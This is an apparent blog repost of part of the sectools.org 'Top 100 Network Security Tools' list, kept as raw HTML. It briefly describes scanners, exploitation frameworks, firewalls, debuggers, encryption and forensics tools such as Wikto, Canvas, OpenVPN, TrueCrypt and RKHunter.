<p>See all <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="wikto"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#84</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.sensepost.com/research/wikto/">Wikto</a> : Web Server Assessment Tool<br />Wikto is a tool that checks for flaws in webservers. It provides much the same functionality as <a href="http://sectools.org/index.html#nikto">Nikto</a> but adds various interesting pieces of functionality, such as a Back-End miner and close <a href="http://sectools.org/tools2.html#google">Google</a> integration. Wikto is written for the MS .NET environment and registration is required to download the binary and/or source code. 
<p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="sguil"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#85</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://sguil.sourceforge.net/"><img src="http://mirror.sectools.org/logos/sguil-80x62.png" align="right" border="0" width="80" height="62" /></a> <a href="http://sguil.sourceforge.net/">Sguil</a> : The Analyst Console for Network Security Monitoring<br />Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides realtime events from <a href="http://sectools.org/index.html#snort">Snort</a>/barnyard. It also includes other components which facilitate the practice of Network Security Monitoring and event driven analysis of IDS alerts. 
<p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="scanrand"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#86</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">39</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.doxpara.com/">Scanrand</a> : An unusually fast stateless network service and topology discovery system<br />Scanrand is a stateless host-discovery and port-scanner similar in design to <a href="http://sectools.org/tools4.html#unicornscan">Unicornscan</a>. It trades off reliability for amazingly fast speeds and uses cryptographic techniques to prevent attackers from manipulating scan results. This utility is a part of a software package called Paketto Keiretsu, which was written by <a href="http://www.doxpara.com/">Dan Kaminsky</a>. Scanrand and Paketto are no longer actively maintained, but the latest released version can still be found at <a href="http://www.doxpara.com/">DoxPara.Com</a>. 
<p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="ipfilter"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#87</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://coombs.anu.edu.au/%7Eavalon/">IP Filter</a> : Portable UNIX Packet Filter<br />IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services. It can either be used as a loadable kernel module or incorporated into your UNIX kernel; use as a loadable kernel module where possible is highly recommended. Scripts are provided to install and patch system files, as required. IP Filter is distributed with FreeBSD, NetBSD, and Solaris. OpenBSD users should see <a href="http://sectools.org/tools3.html#openbsd-pf">Openbsd PF</a> and Linux users <a href="http://sectools.org/index.html#netfilter">Netfilter</a>. 
<p>See all <a href="http://sectools.org/firewalls.html">firewalls</a> </p></td></tr></tbody></table><hr /><a name="canvas"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#88</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.immunitysec.com/products-canvas.shtml"><img src="http://mirror.sectools.org/logos/canvas-97x66.gif" align="right" border="0" width="97" height="66" /></a> <a href="http://www.immunitysec.com/products-canvas.shtml">Canvas</a> : A Comprehensive Exploitation Framework<br />Canvas is a commercial vulnerability exploitation tool from Dave Aitel's <a href="http://www.immunitysec.com/">ImmunitySec</a>. 
It includes more than 150 exploits and is less expensive than <a href="http://sectools.org/tools2.html#impact">Core Impact</a>, though it still costs thousands of dollars. You can also buy the optional <a href="http://www.immunitysec.com/products-visualsploit.shtml">VisualSploit Plugin</a> for drag and drop GUI exploit creation. Zero-day exploits can occasionally be found within Canvas. <p>See all <a href="http://sectools.org/sploits.html">vulnerability exploitation tools</a> </p></td></tr></tbody></table><hr /><a name="vmware"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#89</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.vmware.com/"><img src="http://mirror.sectools.org/logos/vmware-80x19.png" align="right" border="0" width="80" height="19" /></a> <a href="http://www.vmware.com/">VMware</a> : Multi-platform Virtualization Software<br />VMware virtualization software lets you run one operating system within another. This is quite useful for security researchers who commonly need to test code, exploits, etc. on multiple platforms. It only runs on Windows and Linux as the host OS, but pretty much any x86 OS will run inside the virtualized environment. It is also useful for setting up sandboxes. 
You can browse from within a VMware window so that even if you are infected with malware, it cannot reach your host OS. And recovering the guest OS is as simple as loading a "snapshot" from prior to the infection. <a href="http://www.vmware.com/products/player/">VMware Player</a> (executes, but can't create OS images) and <a href="http://www.vmware.com/products/server/">VMware Server</a> (partitions a physical server machine into multiple virtual machines) were recently released for free. Another interesting virtualization system (Linux focused) is <a href="http://www.cl.cam.ac.uk/Research/SRG/netos/xen/">Xen</a>. </td></tr></tbody></table><hr /><a name="tcptraceroute"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#90</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">31</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://michael.toren.net/code/tcptraceroute/">Tcptraceroute</a> : A traceroute implementation using TCP packets<br />The problem is that with the widespread use of firewalls on the modern Internet, many of the packets that the conventional traceroute(8) sends out (ICMP echo or UDP) end up being filtered, making it impossible to completely trace the path to the 
destination. However, in many cases, these firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections on. By sending out TCP SYN packets instead of UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common firewall filters. <p>See all <a href="http://sectools.org/traceroutes.html">traceroute tools</a> </p></td></tr></tbody></table><hr /><a name="saint"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#91</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">67</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.saintcorporation.com/saint/"><img src="http://mirror.sectools.org/logos/saint-80x37.png" align="right" border="0" width="80" height="37" /></a> <a href="http://www.saintcorporation.com/saint/">SAINT</a> : Security Administrator's Integrated Network Tool<br />SAINT is another commercial vulnerability assessment tool (like <a href="http://sectools.org/index.html#nessus">Nessus</a>, <a href="http://sectools.org/tools3.html#iss">ISS Internet Scanner</a>, or <a 
href="http://sectools.org/tools2.html#retina">Retina</a>). It runs on UNIX and used to be free and open source, but is now a commercial product. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="openvpn"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#92</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://openvpn.net/">OpenVPN</a> : A full-featured SSL VPN solution<br />OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. 
OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses <a href="http://sectools.org/tools2.html#openssl">OpenSSL</a> as its primary cryptographic library. <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="ollydbg"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#93</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.ollydbg.de/"><img src="http://mirror.sectools.org/logos/ollydbg-50x50.png" align="right" border="0" width="50" height="50" /></a> <a href="http://www.ollydbg.de/">OllyDbg</a> : An assembly level Windows debugger<br />OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg features an intuitive user interface, advanced code analysis capable of recognizing procedures, loops, API calls, switches, tables, constants and strings, an ability to attach to a running program, and good multi-thread support. OllyDbg is free to download and use but no source code is provided. 
<p>See all <a href="http://sectools.org/disassemblers.html">disassemblers</a> </p></td></tr></tbody></table><hr /><a name="helix"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#94</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.e-fense.com/helix/">Helix</a> : A Linux Distribution with Computer Forensics in Mind<br />Helix is a customized distribution of the Knoppix Live Linux CD. Helix is more than just a bootable live CD. You can still boot into a customized Linux environment that includes customized Linux kernels, excellent hardware detection and many applications dedicated to Incident Response and Forensics. Helix has been designed very carefully to NOT touch the host computer in any way and it is forensically sound. Helix will not auto mount swap space, or auto mount any attached devices. Helix also has a special Windows autorun side for Incident Response and Forensics. 
<p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="bastille"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#95</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">38</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.bastille-unix.org/"><img src="http://mirror.sectools.org/logos/bastille-80x64.gif" align="right" border="0" width="80" height="64" /></a> <a href="http://www.bastille-unix.org/">Bastille</a> : Security hardening script for Linux, Mac OS X, and HP-UX<br />The Bastille Hardening program "locks down" an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system's current state of hardening, granularly reporting on each of the security settings with which it works. Bastille currently supports the Red Hat (Fedora Core, Enterprise, and Numbered/Classic), SUSE, Debian, Gentoo, and Mandrake distributions, along with HP-UX and Mac OS X. Bastille focuses on letting the system's user/administrator choose exactly how to harden the operating system. 
In its default hardening mode, it interactively asks the user questions, explains the topics of those questions, and builds a policy based on the user's answers. It then applies the policy to the system. In its assessment mode, it builds a report intended to teach the user about available security settings as well as inform the user as to which settings have been tightened. <p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="acunetix"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#96</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.acunetix.com/"><img src="http://mirror.sectools.org/logos/acunetix-80x59.gif" align="right" border="0" width="80" height="59" /></a> <a href="http://www.acunetix.com/">Acunetix WVS</a> : Commercial Web Vulnerability Scanner<br />Acunetix WVS automatically checks web applications for vulnerabilities such as SQL Injections, cross site scripting, arbitrary file creation/deletion, weak password strength on authentication pages. AcuSensor technology detects vulnerabilities which typical black box scanners miss. Acunetix WVS boasts a comfortable GUI, an ability to create professional security audit and compliance reports, and tools for advanced manual webapp testing. 
<p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="truecrypt"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#97</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.truecrypt.org/"><img src="http://mirror.sectools.org/logos/truecrypt-40x49.png" align="right" border="0" width="40" height="49" /></a> <a href="http://www.truecrypt.org/">TrueCrypt</a> : Open-Source Disk Encryption Software for Windows and Linux<br />TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase initially. A clever <a href="http://www.truecrypt.org/user-guide/hidden-volume.php">hidden volume</a> feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists. 
<p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="appscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#98</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.ibm.com/software/awdtools/appscan/"><img src="http://mirror.sectools.org/logos/appscan-35x48.gif" align="right" border="0" width="35" height="48" /></a> <a href="http://www.ibm.com/software/awdtools/appscan/">Rational AppScan</a> : Commercial Web Vulnerability Scanner<br />AppScan provides security testing throughout the application development lifecycle, easing unit testing and security assurance early in the development phase. Appscan scans for many common vulnerabilities, such as cross site scripting, HTTP response splitting, parameter tampering, hidden field manipulation, backdoors/debug options, buffer overflows and more. Appscan was merged into IBM's Rational division after IBM purchased its original developer (Watchfire) in 2007. 
<p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="n-stealth"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#99</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">72</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.nstalker.com/nstealth/">N-Stealth</a> : Web server scanner<br />N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as <a href="http://sectools.org/tools3.html#whisker-libwhisker">Whisker/libwhisker</a> and <a href="http://sectools.org/index.html#nikto">Nikto</a>, but do take their web site with a grain of salt. The claims of "30,000 vulnerabilities and exploits" and "Dozens of vulnerability checks are added every day" are highly questionable. Also note that essentially all general VA tools such as <a href="http://sectools.org/index.html#nessus">Nessus</a>, <a href="http://sectools.org/tools3.html#iss">ISS Internet Scanner</a>, <a href="http://sectools.org/tools2.html#retina">Retina</a>, <a href="http://sectools.org/tools4.html#saint">SAINT</a>, and <a href="http://sectools.org/tools3.html#sara">Sara</a> include web scanning components. They may not all be as up-to-date or flexible though. N-Stealth is Windows only and no source code is provided. 
<p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="mbsa"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#100</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">37</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.microsoft.com/technet/security/tools/mbsahome.mspx"><img src="http://mirror.sectools.org/logos/mbsa-30x30.png" align="right" border="0" width="30" height="30" /></a> <a href="http://www.microsoft.com/technet/security/tools/mbsahome.mspx">MBSA</a> : Microsoft Baseline Security Analyzer<br />Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table>Praba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-41917004011451071442009-07-29T05:26:00.001-07:002009-07-29T05:26:35.758-07:00Top 100 Network Security Tools 51-75<table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#51</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.angryziber.com/ipscan/"><img src="http://mirror.sectools.org/logos/angry-64x64.png" align="right" border="0" width="64" height="64" /></a> <a href="http://www.angryziber.com/ipscan/">Angry IP Scanner</a> : IP address and port scanner<br />Angry IP Scanner is a small open source Java application which performs host discovery ("ping scan") and port scans. The old 2.x release was Windows-only, but the new 3.X series runs on Linux, Mac, or Windows as long as Java is installed. Version 3.X omits the <a href="http://sectools.org/images/zebra_page.gif">vampire zebra logo</a>. 
As with all connect()-based scanners, performance on Windows XP SP2 and Vista can be poor due to limitations added to tcpip.sys. The <a href="http://www.angryziber.com/w/FAQ:_Crippled_Windows">Angry FAQ</a> provides details and workarounds. A <a href="http://seclists.org/nmap-dev/2008/q2/0608.html">short review</a> was posted to nmap-dev. <p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="rkhunter"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#52</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.rootkit.nl/projects/rootkit_hunter.html"><img src="http://mirror.sectools.org/logos/rkhunter-76x54.png" align="right" border="0" width="76" height="54" /></a> <a href="http://www.rootkit.nl/projects/rootkit_hunter.html">RKHunter</a> : A Unix Rootkit Detector<br />RKHunter is a scanning tool that checks for signs of various pieces of nasty software on your system like rootkits, backdoors and local exploits. It runs many tests, including MD5 hash comparisons, default filenames used by rootkits, wrong file permissions for binaries, and suspicious strings in LKM and KLD modules. 
<p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="ike-scan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#53</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.nta-monitor.com/tools/ike-scan/"><img src="http://mirror.sectools.org/logos/ike-scan-80x50.png" align="right" border="0" width="80" height="50" /></a> <a href="http://www.nta-monitor.com/tools/ike-scan/">Ike-scan</a> : VPN detector/scanner<br />Ike-scan exploits transport characteristics in the Internet Key Exchange (IKE) service, the mechanism used by VPNs to establish a connection between a server and a remote client. It scans IP addresses for VPN servers by sending a specially crafted IKE packet to each host within a network. Most hosts running IKE will respond, identifying their presence. The tool then remains silent and monitors retransmission packets. These retransmission responses are recorded, displayed and matched against a known set of VPN product fingerprints. 
